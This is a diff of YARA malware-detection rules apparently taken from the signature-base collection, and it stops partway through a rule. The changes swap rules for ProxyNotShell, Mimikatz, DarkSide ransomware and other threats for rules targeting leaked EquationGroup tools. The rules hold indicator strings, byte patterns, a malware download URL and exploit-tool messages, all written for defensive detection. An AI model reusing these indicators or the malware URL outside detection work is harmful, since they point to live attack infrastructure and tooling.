 		modified = "2023-12-05"
-		reference = "https://twitter.com/asfakian/status/1044859525675843585"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_cmd_var_expansion.yar#L2-L14"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3295-L3315"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68ce14cac07494645f3b5f1d61012e4fe21cfa9fa7ad4019add2368b568fe043"
-		score = 60
+		logic_hash = "8c161b36599b11264c31c54b94d6bdba53b3f13d27861ededc9f03bba394b775"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
+		hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
 
 	strings:
-		$a1 = " /V:ON" ascii wide fullword
+		$s1 = "Unable to get -w hash.  %x" fullword wide
+		$s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide
+		$s4 = "Unable to set -w provider. %x" fullword wide
+		$op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 }
+		$op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxynotshell_Patterns_CVE_2022_41040_Oct22_1 : SCRIPT
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Ecwi_ESKE_EVFR_RPC2_2 : FILE
 {
 	meta:
-		description = "Detects successful ProxyNotShell exploitation attempts in log files (attempt to identify the attack before the official release of detailed information)"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2812fcd-0a20-5bbd-a9e1-9cca1ed58aa3"
-		date = "2022-10-11"
-		modified = "2023-03-15"
-		old_rule_name = "EXPL_Exchange_ProxyNoShell_Patterns_CVE_2022_41040_Oct22_1"
-		reference = "https://github.com/kljunowsky/CVE-2022-41040-POC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2022_41040_proxynoshell.yar#L2-L26"
+		id = "6c653b0a-fda4-51d6-bf90-bd637547fe47"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3317-L3336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "81b0f0fea2762beb47826ff95545c87e960e098b9d5f45eacfe07b3ecf319ac5"
+		logic_hash = "73522034c6588fee090eff87602568371562bdbcbe781ee6e152f3b854514690"
 		score = 75
-		quality = 60
-		tags = "SCRIPT"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$sr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}owershell/ nocase ascii
-		$sa1 = " 200 "
-		$fp1 = " 444 "
-		$fp2 = " 404 "
-		$fp2b = " 401 "
-		$fp3 = "GET /owa/ &Email=autodiscover/autodiscover.json%3F@test.com&ClientId=" ascii
-		$fp4 = "@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" ascii
+		$s1 = "Target is share name" fullword ascii
+		$s2 = "Could not make UdpNetbios header -- bailing" fullword ascii
+		$s3 = "Request non-NT session key" fullword ascii
 
 	condition:
-		$sr1 and 1 of ( $sa* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_APT_Operation_Shadowhammer_Malsetup : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__EAFU_Ecwi_ESKE_EVFR_RPC2_4 : FILE
 {
 	meta:
-		description = "Detects a malicious file used by BARIUM group in Operation ShadowHammer"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "000f840a-848d-5f82-84bf-70690efbd4de"
-		date = "2019-03-25"
+		id = "9dc9ed95-5233-56e1-b8f1-4f27f43e7e43"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-shadowhammer/89992/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_shadowhammer.yar#L2-L22"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3338-L3361"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dea31e401997b0aed1753754fd572a94df308229fccdf15ae6a907dcfd59b50a"
-		score = 80
+		logic_hash = "ed6e0e4e5a0849aad64bbc47c047f3fe388052d0ebe89de0257d4422fb39be21"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac0711afee5a157d084251f3443a40965fc63c57955e3a241df866cfc7315223"
-		hash2 = "9acd43af36f2d38077258cb2ace42d6737b43be499367e90037f4605318325f8"
-		hash3 = "bca9583263f92c55ba191140668d8299ef6b760a1e940bddb0a7580ce68fef82"
-		hash4 = "c299b6dd210ab5779f3abd9d10544f9cae31cd5c6afc92c0fc16c8f43def7596"
-		hash5 = "6aedfef62e7a8ab7b8ab3ff57708a55afa1a2a6765f86d581bc99c738a68fc74"
-		hash6 = "cfbec77180bd67cceb2e17e64f8a8beec5e8875f47c41936b67a60093e07fcfd"
+		super_rule = 1
+		hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
+		hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+		hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$x1 = "\\AsusShellCode\\Release" ascii
-		$x2 = "\\AsusShellCode\\Debug"
+		$x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii
+		$s1 = "WsaErrorTooManyProcesses" fullword ascii
+		$s2 = "NtErrorMoreProcessingRequired" fullword ascii
+		$s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+		$s4 = "ServerErrorBadNamePassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of ( $s* ) or 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_Mimikatz_Kirbi_Ticket : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Sendcftrigger_Sendpktrigger_6 : FILE
 {
 	meta:
-		description = "KiRBi ticket for mimikatz"
-		author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
-		id = "a37249e0-ab3b-50c2-9473-1e69185713cc"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "658d6f7d-2164-5e43-b5a5-d9bea9cd2e27"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kirbi_mimkatz.yar#L10-L23"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3363-L3379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2a62c24954d64346e419985ef5bf2b357b2aee41ac6b33d379dbd65cf5c9f92b"
+		logic_hash = "4fb290bdf15e0701b6d543e1f978011046abe23e58c790ee1b992a5e0443a271"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
+		hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
 
 	strings:
-		$asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
-		$asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 }
+		$s4 = "* Failed to connect to destination - %u" fullword wide
+		$s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide
 
 	condition:
-		$asn1 at 0 or $asn1_84 at 0
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_VUL_Jquery_Fileupload_CVE_2018_9206 : CVE_2018_9206
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Addresource : FILE
 {
 	meta:
-		description = "Detects JQuery File Upload vulnerability CVE-2018-9206"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20bac44c-0e5a-5561-9fd8-a71cd2d8590a"
-		date = "2018-10-19"
+		id = "cbba38fa-a906-5463-ae46-2b9c9f1bf8e0"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_jquery_fileupload_cve_2018_9206.yar#L1-L16"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3381-L3398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef7cc13130c60ece346802cb6efec96065f84407fb84b89703628fdf32c0ee53"
+		logic_hash = "e59863ac7f1147cdbc34cbd2b09183487999d9f01974279c7ccc0c5af7a99976"
 		score = 75
 		quality = 85
-		tags = "CVE-2018-9206"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
+		hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
 
 	strings:
-		$s1 = "error_reporting(E_ALL | E_STRICT);" fullword ascii
-		$s2 = "require('UploadHandler.php');" fullword ascii
-		$s3 = "$upload_handler = new UploadHandler();" fullword ascii
+		$s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii
+		$s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii
+		$s3 = "Unable to get path for target binary." fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_Metasploit_Loader_Rsmudge : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ESKE_RPC2_8 : FILE
 {
 	meta:
-		description = "Detects a Metasploit Loader by RSMudge - file loader.exe"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d8a215e-a942-5df9-bdad-0c4158992429"
-		date = "2016-04-20"
+		id = "694a1afc-7fea-58ac-b736-44957bbc0334"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/rsmudge/metasploit-loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_loader_rsmudge.yar#L10-L27"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3400-L3416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50b1898e3087a5e0876b87179252c452af48e00bbef52297060d70acd90d0133"
+		logic_hash = "1fa706fb7f138d679421fe6c5b29d6bf93893adc8bffe9dffaafa728c1b2d1d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "afe34bfe2215b048915b1d55324f1679d598a0741123bc24274d4edc6e395a8d"
+		super_rule = 1
+		hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$s1 = "Could not resolve target" fullword ascii
-		$s2 = "Could not connect to target" fullword ascii
-		$s3 = "%s [host] [port]" fullword ascii
-		$s4 = "ws2_32.dll is out of date." fullword ascii
-		$s5 = "read a strange or incomplete length value" fullword ascii
+		$s4 = "Fragment: Packet too small to contain RPC header" fullword ascii
+		$s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 3 of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_RTF_Embedded_OLE_PE : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_10 : FILE
 {
 	meta:
-		description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20044f08-9574-5baf-b91e-47613e490d62"
-		date = "2018-01-22"
-		modified = "2023-11-25"
-		reference = "https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_strings_in_ole.yar#L2-L27"
+		id = "7dfff868-cb66-51c0-a7c7-5cc872232b86"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3441-L3458"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "054abb34ae84e02469d726809a6d8aa582ebad65dd8385de7800d3f5db7ee31c"
-		score = 65
+		logic_hash = "bc30c62da7a7fd9144efef6f44c50552234f372c38c4479a024fbb0ca72530de"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
 
 	strings:
-		$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
-		$a2 = "4b45524e454c33322e646c6c" ascii
-		$a3 = "433a5c66616b65706174685c" ascii
-		$m3 = "4d5a40000100000006000000ffff"
-		$m2 = "4d5a50000200000004000f00ffff"
-		$m1 = "4d5a90000300000004000000ffff"
+		$x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii
+		$x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii
+		$s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Scanbox_Malware_Generic
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 : FILE
 {
 	meta:
-		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7867e65-567f-530f-83d4-b5126021e523"
-		date = "2015-02-28"
+		id = "d6848065-377b-5eda-821d-d2cc16f483cc"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/WXUQcP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_scanbox_deeppanda.yar#L2-L34"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3460-L3479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5f521d3f000fb39e5e3b08657e75219e93fb3bb8ffbbdbd70f471928a56bef27"
+		logic_hash = "8d43aa4823de248308597bd02cd27e598808b94e1ad7348ddb9e27d8a37ac426"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
-		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
-		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
 
 	strings:
-		$s0 = "http://142.91.76.134/p.dat" fullword ascii
-		$s1 = "HttpDump 1.1" fullword ascii
-		$s3 = "SecureInput .exe" fullword wide
-		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
-		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
-		$s6 = "ServiceMaix" fullword ascii
-		$x1 = "Management Support Team1" fullword ascii
-		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
-		$x3 = "SEOUL1" fullword ascii
+		$x1 = "Target is vulnerable" fullword ascii
+		$x2 = "Target is NOT vulnerable" fullword ascii
 
 	condition:
-		(1 of ( $s* ) and 2 of ( $x* ) ) or ( 3 of ( $x* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkside_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_Ridearea2_12 : FILE
 {
 	meta:
-		description = "Detects Darkside Ransomware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5592065-591e-597b-bebb-f20bc306fe52"
-		date = "2021-05-10"
+		id = "63c7733c-9942-56f3-95cc-f3e72b693739"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/020c1740-717a-4191-8917-5819aa25f385/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L2-L23"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3481-L3498"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "84de92b0b36e373aa61e314a04597bd0578a04af34c501ae9071e5f4fa27c07a"
+		logic_hash = "0119cd825c02a094ddd76c5cb27bee6cef112f25333eab62017448804b29286e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e"
 
 	strings:
-		$op1 = { 85 c9 75 ed ff 75 10 ff b5 d8 fe ff ff ff b5 dc fe ff ff e8 7d fc ff ff ff 8d cc fe ff ff 8b 8d cc fe ff ff }
-		$op2 = { 66 0f 6f 06 66 0f 7f 07 83 c6 10 83 c7 10 49 85 c9 75 ed 5f }
-		$op3 = { 6a 00 ff 15 72 0d 41 00 ab 46 81 fe 80 00 00 00 75 2e 6a ff 6a 01 }
-		$op4 = { 0f b7 0c 5d 88 0f 41 00 03 4c 24 04 89 4c 24 04 83 e1 3f 0f b7 14 4d 88 0f 41 00 03 54 24 08 89 54 24 08 83 e2 3f }
-		$s1 = "http://darksid" ascii
-		$s2 = "[ Welcome to DarkSide ]" ascii
-		$s3 = ".onion/" ascii
+		$x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them or all of ( $op* ) or all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Ransomware_Win_DARKSIDE_V1_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_13 : FILE
 {
 	meta:
-		description = "Detection for early versions of DARKSIDE ransomware samples based on the encryption mode configuration values."
-		author = "FireEye"
-		id = "322a3de5-a7e5-52b9-8648-6019954e92d7"
-		date = "2021-03-22"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8bc3c47c-7357-5692-86aa-e43b40f8c1ab"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L25-L37"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3500-L3516"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1a700f845849e573ab3148daef1a3b0b"
-		logic_hash = "b3612510bd1f2ca7543e217e97037b02d312bcda2b2df16d9be3216749ea4beb"
+		logic_hash = "0a1859266b859d4da660a7fc7d0015954ff100c39b941b5461ba0c99b5103547"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
 
 	strings:
-		$consts = { 80 3D [4] 01 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] 00 00 04 00 [1-10] 00 00 00 00 [1-30] 80 3D [4] 02 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] FF FF FF FF [1-10] FF FF FF FF [1-30] 03 00 00 00 [1-10] 03 00 00 00 }
+		$x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." fullword ascii
+		$s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $consts
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Dropper_Win_Darkside_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Nameprobe_SMBTOUCH_14 : FILE
 {
 	meta:
-		description = "Detection for on the binary that was used as the dropper leading to DARKSIDE."
-		author = "FireEye"
-		id = "910a581c-25a4-5d5e-acdc-6d87cbedd3cf"
-		date = "2021-05-11"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b3b7037b-d08e-5b32-93ec-870f8ce088ac"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L39-L56"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3518-L3535"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "131b3666ae444e0de043eafdf7cfd3324b927d18d8ad56d5004ea09b2da5610e"
+		logic_hash = "c60fc34aa42810a5622fbe53122ded4ffb4ee321fed1badd481ce5c2ae5225ef"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
+		hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
 
 	strings:
-		$CommonDLLs1 = "KERNEL32.dll" fullword
-		$CommonDLLs2 = "USER32.dll" fullword
-		$CommonDLLs3 = "ADVAPI32.dll" fullword
-		$CommonDLLs4 = "ole32.dll" fullword
-		$KeyString1 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 57 69 6E 64 6F 77 73 2E 43 6F 6D 6D 6F 6E 2D 43 6F 6E 74 72 6F 6C 73 22 20 76 65 72 73 69 6F 6E 3D 22 36 2E 30 2E 30 2E 30 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 }
